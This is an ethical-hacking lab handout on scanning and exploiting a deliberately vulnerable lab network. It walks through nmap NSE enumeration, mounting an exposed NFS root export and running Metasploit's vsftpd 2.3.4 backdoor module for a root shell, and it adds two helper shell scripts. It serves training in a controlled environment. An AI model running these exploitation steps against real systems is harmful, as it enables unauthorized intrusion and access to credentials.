Lab 3 - Vulnerability Scanning and Exploitation Instructions - Mar 4

This document outlines a lab exercise focused on vulnerability scanning and exploitation using tools like SPARTA and Metasploit. Students will learn to identify vulnerabilities in computer systems, perform scans, and exploit known vulnerabilities in a controlled environment. The lab is designed for intermediate learners and includes specific tasks, materials needed, and safety warnings regarding penetration testing techniques.


OCR@UC Lab _____________________________________________

LESSON TITLE: Lab 3 - Vulnerability Scanning and Exploitation

WARNING: Any use of penetration testing techniques on a live network could result in expulsion
and/or criminal prosecution. Techniques are to be used in lab environments, for educational
use only, or on networks for which you have explicit permission to test the defenses.

Level: ☐Beginner ☒Intermediate ☐Advanced
Time Required: 60 minutes

Audience: ☒Instructor-led ☐Self-taught

Lesson Learning Outcomes: Upon completion of this lesson, students will be able to:
- Demonstrate the use of different vulnerability scanning tools.
- Identify vulnerabilities within a computer system.
- Demonstrate the use of pre-built tools to exploit a vulnerability in a computer system.

Materials List:
- Computers with Internet connection
- Browsers: Firefox (preferred), Google Chrome, or Internet Explorer
- Intro to Ethical Hacking lab environment

Introduction
In this lab we will explore methods of vulnerability scanning and exploitation using tools such
as SPARTA and Metasploit. Follow the steps below and answer all questions in your own
words with as much detail as possible. Paste screen shots where requested. Include your
username in the filename.
Systems and tools needed:
- Kali Linux (u: root, p: toor)
- Metasploitable2 (the intentionally vulnerable Linux VM; referred to below as the Metasploitable2 system)
- Windows XP (SP2)
- Ubuntu 12.04
- Power down all other systems on your network.
Module Activity Description:
Part One: Vulnerability Scanning with SPARTA

Note: the Target and Task settings below (Alive Test, Scan Config, Add Results to Assets, Filtered Report)
are the terms used by the OpenVAS web interface (Greenbone Security Assistant), not by SPARTA. If your lab
image provides OpenVAS, create the Target and Task there; the scope scan in the last step is done in SPARTA.

Create a New Target called ScanNetwork with the following settings:
- Manual IP: 192.168.2.0/24 (or the network address of your network)
- Exclude Hosts: <IP address of your Kali system>
- Port List: SPARTA Default
- Alive Test: Scan Config Default
Create a New Scan Task called DefaultScan with the following settings:
- Scan Targets: ScanNetwork
- Schedule: select the Once checkbox
- Add Results to Assets: Yes
- Leave all other defaults
Run the scan you just created (this will take several minutes to complete).
Once it completes, go to Scans > Results to view an overview of what the scan detected.

In SPARTA, add 192.168.2.0/24 (or your network address) to the scope and run a full scan.


1. Paste a screen shot of this page.

Create a filtered report of the results and download it as a PDF file. Review the report and,
based on the scan results, answer the following questions:
2. Which of your systems had the most vulnerabilities?

3. Which port on the Windows XP system showed vulnerabilities?

4. What CVE IDs are associated with the top vulnerability on your XP system?

5. What is the potential impact of this vulnerability being exploited?

6. Look at the top 2 vulnerabilities on the Metasploitable2 system. Describe how the scan
detected these vulnerabilities.
Module Activity Description:
Part Two: Vulnerability Detection with NMAP NSE
In this section, we will use prebuilt nmap NSE scripts to try to discover potential
vulnerabilities within our Metasploitable2 system. A list of all built-in scripts can be found at
https://nmap.org/nsedoc/.
7. Determine the IP address of your Metasploitable2 system and record it here:

Run a service detection scan to determine the open ports and service information (by default
nmap probes the 1000 most common TCP ports; add -p- to cover all 65535):
nmap -sV <IP of system>
8. Paste a screen shot of the output.

Notice that Apache (httpd), Samba (smb), and NFS are services that are running on this system.
Let’s explore these.
Find which directories are accessible from NFS:
nmap --script nfs-ls <IP of system>

9. Paste a screen shot of the output.

Enumerate which users can access Samba shares:


nmap --script smb-enum-users <IP of system>

10. Paste a screenshot of the top of the script results.

11. Which user accounts are enabled for Samba?

Enumerate common directories on the HTTP service:

nmap --script http-enum <IP of system>
12. List any directories that you think might contain potential vulnerabilities.

Try out some more scripts on your own. Find 2 that reveal some vulnerability information.
13. Paste screen shots and descriptions of the two scripts below.
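The Part Two commands above can be scripted so that the service scan decides which NSE scripts run and every result is saved for your screen shots. The script below is an added example, not part of the lab: it parses nmap -sV output into a service inventory, maps each open service to the scripts this lab uses (plus smb-enum-shares and ftp-vsftpd-backdoor from the same NSE library), and, only when the assumed TARGET environment variable is set, runs the real scans. The sample scan output embedded in it is constructed to resemble a Metasploitable2 report and is not real scan data.

```shell
#!/bin/sh
# Added example (not part of the lab): turn an `nmap -sV` report into a service
# inventory and let it drive the NSE scripts. TARGET is an assumed variable; the
# sample below is constructed to look like a Metasploitable2 scan, not real data.

SAMPLE_SCAN='Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.2.50
Host is up (0.00041s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs         2-4 (RPC #100003)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
Service Info: Hosts: metasploitable.localdomain'

# inventory: print "port service version" for every open TCP port in a report.
# Only lines shaped like "NN/tcp open service version..." are considered.
inventory() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
        port = $1; sub(/\/tcp/, "", port)
        version = ""
        for (i = 4; i <= NF; i++) version = version (i > 4 ? " " : "") $i
        print port, $3, version
    }'
}

# suggest_scripts: map each open service to the NSE scripts worth running,
# printed as "port script1,script2" ready for nmap --script.
suggest_scripts() {
    inventory "$1" | awk '
        $2 == "nfs"         { print $1, "nfs-showmount,nfs-ls" }
        $2 == "netbios-ssn" { print $1, "smb-enum-users,smb-enum-shares" }
        $2 == "http"        { print $1, "http-enum" }
        $2 == "ftp" && $0 ~ /vsftpd 2\.3\.4/ { print $1, "ftp-vsftpd-backdoor" }
    '
}

# Live run against the lab target; skipped unless TARGET is set, e.g.
#   TARGET=192.168.2.50 sh nse-enum.sh
if [ -n "${TARGET:-}" ]; then
    outdir="nse-$TARGET"
    mkdir -p "$outdir"
    nmap -sV -oN "$outdir/service-scan.txt" "$TARGET" >/dev/null
    echo "== open services on $TARGET =="
    inventory "$(cat "$outdir/service-scan.txt")"
    echo "== NSE scripts run per port =="
    suggest_scripts "$(cat "$outdir/service-scan.txt")" | while read -r port scripts; do
        echo "port $port -> $scripts"
        nmap -p "$port" --script "$scripts" -oN "$outdir/port-$port.txt" "$TARGET" >/dev/null
    done
    echo "results saved under $outdir/"
fi
```

Run it on Kali as TARGET=<IP of system> sh nse-enum.sh; without TARGET it only exercises the parser on the embedded sample, which is a convenient way to check the awk patterns before pointing it at the lab network.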
Module Activity Description:
Part Three: Exploiting Vulnerabilities
In this section we will look at some examples of exploiting known vulnerabilities. Keep in
mind that these are very simple examples of issues that should be patched on most systems. DO NOT
attempt to run these or any other exploits on a system you are not authorized to test.
Earlier we discovered that NFS directories were exported. Now we will attempt to mount the root
of the file system on Kali to access them.

First install the NFS client:

apt-get install nfs-common
Check which directories are mountable:
nmap --script nfs-showmount <IP of system>
Info: It appears the root (/) is mountable, so mount it on your Kali system:
mkdir /tmp/nfs
mount -o nolock -t nfs <IP of system>:/ /tmp/nfs
Now you can navigate and read the files of the Metasploitable2 system under /tmp/nfs. Run a
directory listing of /tmp/nfs.
1. Paste a screen shot of the directory listing.

Now let's see what we can access. Navigate to the msfadmin user's home directory and find the
hidden .ssh directory.
cd /tmp/nfs/home/msfadmin/.ssh
Open the authorized_keys file.

2. Paste a screen shot of the file contents.

Info: authorized_keys holds the public keys that are allowed to log in as msfadmin; it is not a
private key. What you found is the list of identities the account trusts. If the export is mounted
read-write, appending your own public key to this file would let you SSH in as msfadmin, which is
why a world-mountable NFS export of the whole file system is a serious finding.
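One way to do the NFS step so it is repeatable and touches nothing on the target, as an added example that is not part of the lab: the script mounts the export read-only, lists the exports with showmount (the nfs-common package installed above provides it, and it reports the same data as the nfs-showmount script), and parses authorized_keys to show what each line really is: optional restriction options, a public key type, the key, and a comment. TARGET and MNT are assumed variables, vers=3 is an assumption about the old NFS server on Metasploitable2, and the sample key file is constructed with placeholder key data.

```shell
#!/bin/sh
# Added example (not part of the lab): read-only NFS mount plus an
# authorized_keys parser. TARGET and MNT are assumed variables; the sample
# key file below is constructed and carries no real key material.

SAMPLE_AUTH_KEYS='# keys permitted to log in as msfadmin
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAexample msfadmin@metasploitable
ssh-dss AAAAB3NzaC1kc3MAAACBAexample user@lab-kali
'

# list_keys: print "restricted|unrestricted keytype comment" per key line.
# authorized_keys lines are: [options] keytype base64key [comment]; the file
# lists PUBLIC keys allowed to log in, it is not an "encryption key".
list_keys() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ { next }
        /^[[:space:]]*$/ { next }
        {
            # The key type is the first field starting with ssh-, ecdsa- or sk-.
            for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) break
            if (i > NF) { print "unparsed", $0; next }
            # Anything before the key type is an option list (from=, command=, ...).
            restricted = (i > 1) ? "restricted" : "unrestricted"
            comment = (i + 2 <= NF) ? $(i + 2) : "(no comment)"
            print restricted, $i, comment
        }'
}

# count_keys: number of key lines that parsed as real keys.
count_keys() {
    list_keys "$1" | grep -v '^unparsed' | wc -l | tr -d ' '
}

# Live workflow; skipped unless TARGET is set, e.g. TARGET=192.168.2.50 sh nfs-keys.sh
if [ -n "${TARGET:-}" ]; then
    MNT="${MNT:-/tmp/nfs}"
    echo "== exports advertised by $TARGET =="
    showmount -e "$TARGET"
    mkdir -p "$MNT"
    # ro: never modify the target; nolock: no lock daemon needed;
    # vers=3: assumed to match the old server (drop it if mount negotiates fine).
    mount -o ro,nolock,vers=3 -t nfs "$TARGET:/" "$MNT"
    echo "== authorized_keys for msfadmin ($(count_keys "$(cat "$MNT/home/msfadmin/.ssh/authorized_keys")") keys) =="
    list_keys "$(cat "$MNT/home/msfadmin/.ssh/authorized_keys")"
    umount "$MNT"
fi
```

Mounting with ro is the practitioner's default here: it keeps the evidence unchanged and makes it impossible to accidentally write into the target's file system while you explore it.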

Using the Metasploit framework to run an exploit

In our port scans we discovered that vsftpd version 2.3.4 was running. This version had a
well-known backdoor: the download archive for it was tampered with by an unknown attacker (not by
the project's own developer), and the backdoor gives a remote client a root shell. We can use a
Metasploit module to exploit this vulnerability.
Start msfconsole and select the module that runs the exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
Set the target to your Metasploitable2 system (older Metasploit releases name the option RHOST;
current releases use RHOSTS, and show options tells you which your copy expects):
set RHOST <IP of system>
show targets
set TARGET 0
Verify the options and run the exploit:
show options
exploit
This opens a command shell session running as root (Metasploit labels it a shell session; it is not
a Telnet or SSH login). Run a few commands to test it:
whoami
hostname
grep root /etc/passwd
3. Paste a screen shot of these commands.

Info: On a system using shadow passwords (the Linux default, including this one) /etc/passwd shows
only an x in the password field; the actual hashes are in /etc/shadow, which your root session can
read. Either way, root's account details could come in handy later.
Find another exploit module that works against Metasploitable2 (there are many guides
available on the Internet).
4. Provide screen shots of running the exploit. Then answer the following questions.

5. What service did this exploit use?

6. What is the CVE ID and description of the vulnerability that it took advantage of?

7. What were you able to access after successfully running the exploit?
